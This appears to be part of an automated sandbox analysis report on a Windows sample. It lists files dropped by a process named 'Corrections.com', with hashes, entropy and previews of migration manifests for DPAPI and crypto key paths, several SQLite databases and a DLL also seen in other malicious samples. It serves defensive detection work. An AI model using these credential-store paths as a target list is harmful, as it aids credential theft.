                                                                                                                                                                                                                                                                                          Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-dpapi-keys-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows V
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4309
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.059776328378613
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:22CBzmeQiHRAQgXx9QgXcOaBIpghKkQlwYBwkbsgo9:MmCZy7BhA
                                                                                                                                                                                                                                                                                          MD5:3A9306662FE93D09B05B9AE44128BCF1
                                                                                                                                                                                                                                                                                          SHA1:77A917FFE8FF0EAAD8F3D3B764836C810E4C9DF5
                                                                                                                                                                                                                                                                                          SHA-256:1988183ECBC3C6987DA9CB598C78B52D7563D995FA94D1E91E0470392E765374
                                                                                                                                                                                                                                                                                          SHA-512:DA1F2776E8D1E08076032365B0D463DC847A31C6C360181D9966488455E878C7738DEC6F2B39153B2A410E3BEB73A05EB524593D125077273343740826A7B9F9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-dpapi-keys".. processorArchitecture="*".. version="0.0.0.0".. />.. <migration.. scope="Upgrade,MigWiz,USMT,Data".. settingsVersion="1".. replacementSettingsVersionRange="0" .. >.. <machineSpecific>.. <migXml xmlns="">.. <rules context="User">.. <include>.. <objectSet>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Protect [CREDHIST]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Protect\* [Preferred]</pattern>.. </objectSet>.. </include>.. <merge script="MigXmlHelper.DestinationPriority()">.. <objectSet>..
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):126976
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                                                          MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                                                          SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                                                          SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                                                          SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):294912
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.08436842005578409
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
                                                                                                                                                                                                                                                                                          MD5:2CD2840E30F477F23438B7C9D031FC08
                                                                                                                                                                                                                                                                                          SHA1:03D5410A814B298B068D62ACDF493B2A49370518
                                                                                                                                                                                                                                                                                          SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
                                                                                                                                                                                                                                                                                          SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1095
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.976174799333973
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:p/o2e8ZR+UX6g0cj3+3A63sDEF4wwVpQwuoMBX0FCUK:22e8v+DgfLUwY4fcZB2A
                                                                                                                                                                                                                                                                                          MD5:ECC51190BD585AB376691BBDDF2A638B
                                                                                                                                                                                                                                                                                          SHA1:84DE01CF25B71C0BC4D16FAF65BE1589E385EAF0
                                                                                                                                                                                                                                                                                          SHA-256:6F15C7E90A3C414BEAD4C1C50DC5E7CAB987D72E2F49953B717A879D7745038C
                                                                                                                                                                                                                                                                                          SHA-512:C0626F92BD934A3C5295EA32D63910C3F51E0A47CB6287C698C0DF7EE66C1D1A1867FDE10F824BD7514566C69CD2DA16571D3F0DC56FE9DE39D13F89DFE2A02A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-Embedded-KeyboardFilterService-Client".. processorArchitecture="*".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. replacementSettingsVersionRange="0-1".. settingsVersion="2".. >.. <machineSpecific>.. <migXml xmlns="">.. Per-machine state -->.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SOFTWARE\Microsoft\Windows Embedded\KeyboardFilter\* [*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\MsKeyboardFilter [Start]</pattern>.. </objectSet>.. </inc
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1065
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.96984082363901
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:p/o2e8ZF2YS+pg0cjh3N1LRMEF4wuSb3wuyBX0FCUK:22e8z2j+pgfZlMY4Qr0B2A
                                                                                                                                                                                                                                                                                          MD5:4DBFCA3B87A59186D2612A95CA2CD899
                                                                                                                                                                                                                                                                                          SHA1:4C84BD2D60CE789B44070CDDC296C09D2F52B1CC
                                                                                                                                                                                                                                                                                          SHA-256:2C229D8DA31E17FCEF244A8A2029CA8FE8374738A9ECBFED9E23FB89DB8DF059
                                                                                                                                                                                                                                                                                          SHA-512:704ECDBE3FC38AC3807946072C7C523C36B4AF1586BEFE01A87BBBF35CF20214A0E0DE892A56E74FE8AA806154D7D2B9CC7028AEF47BEC326564B5F18CD12421
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-OneCore-TetheringService".. processorArchitecture="*".. version="0.0.0.0".. />.. <migration.. replacementSettingsVersionRange="0".. settingsVersion="1".. alwaysProcess="Yes".. >.. <machineSpecific>.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\icssvc\Roaming\*[*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\icssvc\Settings\*[*]</pattern>.. </objectSet>.. </include>.. </rules>..
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3019
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.884926762491409
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:22e8z2j+YgfH0LeIg6aFnJmINGbYgaFnQ7sPvh27+QgL7sYN2b4waFnw+:22X2qD0SPJv1/Pvh2S/pVN
                                                                                                                                                                                                                                                                                          MD5:63F04FB9936532B21E616E88E3EBED14
                                                                                                                                                                                                                                                                                          SHA1:56CEC96A0D4B10C6FC28C726B76BEF278CBC512F
                                                                                                                                                                                                                                                                                          SHA-256:61C5B3D0FD4051236AD00A0A39BE2F75F7E0DEC2AFBFF85617AED19AEF3FC650
                                                                                                                                                                                                                                                                                          SHA-512:66FF4756CE723378126DC6C1EC493B665D08387B3305A97ED9A80500CCCE6001DFB7F8957E8246C7C572D0362DA49EEC7AF8451B849F9E0E89FD8E14041CE75D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-Windows-Extensible-Authentication-Protocol-Host-Service".. processorArchitecture="*".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. replacementSettingsVersionRange="0".. replacementVersionRange="6.0-6.1.7150".. scope="Upgrade,MigWiz,USMT".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\EapHost\Methods\* [*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\EapHost\Configuration\
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):8193
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.027484893998515
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:WNPERXr2q6QOOzJMk67cY8GrPVYRjDjXK2FJpjjsjwjZjj6OzJMk67cY8GrPVYRM:a2gwP625sQ9jsw902I
                                                                                                                                                                                                                                                                                          MD5:2D6ACF2AEC5E5349B16581C8AE23BF3E
                                                                                                                                                                                                                                                                                          SHA1:0AA7B29E8F13EB16F3DFC503D4E8CC55424ECB15
                                                                                                                                                                                                                                                                                          SHA-256:B48F54A1F8A4C3A25D7E0FBCB95BF2C825C89ACD9C80EBACE8C15681912EDEA2
                                                                                                                                                                                                                                                                                          SHA-512:7943AA852F34778B9197C34E6B6978FE51E0CDD2130167CB9C7C56D1B2B1272051EFE03DF3A21A12ECB9B9303DE0733E335CDE0BBBE1A1FC429E3323D335A1FE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly>.. AuthUI has 3 different component names that matter in its migration story... The one that applies during the migration gather phase is as follows:.. Microsoft-Windows-Authentication-AuthUI: Vista and Win7.. Microsoft-Windows-Authentication-AuthUI-Component: Win8 (and beyond).. In order to support migration from Vista/Win7 to Win8, we update the Microsoft-Windows-Authentication-AuthUI component.. to gather in the MigWiz scope (in addition to the Upgrade scope, which it already supported)... -->.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-Windows-Authentication-AuthUI".. processorArchitecture="*".. publicKeyToken="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration .. optimizePatterns="no".. offlineApply="no".. alwaysProcess="yes".. scope="MigWiz,
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1941
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.861537145678193
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:22e8v+phDgrcHreIg/0xJ9U3C0gcj0kqIg/0xJuX:22CphPHyx0ruS0N0kqx0rQ
                                                                                                                                                                                                                                                                                          MD5:6F0056EC818D4FC20158F3FF190D6D6A
                                                                                                                                                                                                                                                                                          SHA1:9E2108FE560CC2187395C5EED011559D201CE45D
                                                                                                                                                                                                                                                                                          SHA-256:2F9596801DBE57D73C292BE4F93BD0C05F6D0A44C7A45F5F03FDBE35993B7DEC
                                                                                                                                                                                                                                                                                          SHA-512:72C193919EC4402D430CCBCC4F9A9B25DC9AAECBCCAEE666EFE20DA4133964D2382F1090EEB8FB0A3073ACAA7825AF7A62B59447D29F912A19BD4C04CDDF1AD1
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-CertificateAuthority-Enrollment-ServerUpgrade".. processorArchitecture="*".. version="1.0.0.0".. versionScope="nonSxS".. />.. <migration.. alwaysProcess="yes".. replacementSettingsVersionRange="0".. replacementVersionRange="6.1.*".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\Software\Microsoft\ADCS\CES [ConfigurationStatus]</pattern>.. </objectSet>.. </include>.. </rules>.. <rules context="System">.. <detects>.. <detect>.. Detection of CES. -
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):114688
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):49152
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):159744
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                                                          MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                                                          SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                                                          SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                                                          SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2829
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.130068712095974
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:/2e8G+F0Vg8DIIgPdunPduPPduNJ7IgfCfikfidjikjirJu/MY4C5uXC5u/C5upL:/29F+cO0Mf7Rwiai5ieiFEMAQSQaQwX4
                                                                                                                                                                                                                                                                                          MD5:CD55A48FE382A6820EC4FB55A66C2858
                                                                                                                                                                                                                                                                                          SHA1:70A0A7B0E12DF915BD5E68FF0432637EFC2153DE
                                                                                                                                                                                                                                                                                          SHA-256:97838AB994B53DFADEEF63955EECB05A7F118C2066EF97B0B0EB7BB48A526451
                                                                                                                                                                                                                                                                                          SHA-512:37C6D78CCD807B04834659B5E796424C443B2C4F72481CB4080ED1BC5E6A954E47C4AF837A653DDAAFED2372C4FF60CE442170EA58586AB93C57B841449C5195
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. name="Microsoft-Windows-Crypto-keys".. version="0.0.0.0".. processorArchitecture="*".. language="neutral".. />.. <migration scope="Upgrade,MigWiz,USMT" .. replacementVersionRange="6.0-6.1".. replacementSettingsVersionRange="0".. settingsVersion="0" .. >.. <migXml xmlns="">.. <rules context="User">.. <include>.. <objectSet>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\RSA\*[*]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\DSS\*[*]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\Keys[*]</pattern>.. </objectSet>.. </include>.. </rules>..
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):24008
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.062446965815151
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:GKODczWz9IdqYbN9h+rKipXKuS28xb3HWJvah46Flkzl2W4FWEWSawTyihVWQ4e1:6DiWzGG+mKlxb32JyczEW4FWdwGyUlI
                                                                                                                                                                                                                                                                                          MD5:6AEAEBF650EFC93CD3B6670A05724FE8
                                                                                                                                                                                                                                                                                          SHA1:A4FE07E6C678AC8D4DC095997DB5043668D103B4
                                                                                                                                                                                                                                                                                          SHA-256:C86891B9DF9FEEA2E98F50C9950CB446DB97A513AF0C23810F7CA818A6187329
                                                                                                                                                                                                                                                                                          SHA-512:5C7E8C7DBAEB22956C774199BAD83312987240D574160B846349C0E237445407FF1CAACD2984BFAD0BBBE6011CC8918AF60A0EBBE82A8561CAFA4DF825ADD183
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                                                                          • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: xoJxSAotVM.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: fim3BhyKXP.gif, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: TMX.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: lem.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: ljwIPDSwFi.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: jE4zclRJU2.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: 5CG2133F5Y_2024-04-05_12_15_35.569.zip, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q..Q..Q..E...S..E...]..Q..t..E...Z..E...P..E...S..E.S.P..E...P..RichQ..................PE..d....Q.!..........",.........$......................................................Bn....`A.........................................<..X....<..x....p..(....`..h....<...!......(....8..T............................0..............(1..0............................text...p........................... ..`.rdata..>....0......................@..@.data...`....P.......0..............@....pdata..h....`.......2..............@..@.rsrc...(....p.......4..............@..@.reloc..(............:..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):10219
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.966520026409024
                                                                                                                                                                                                                                                                                          Encrypted:false
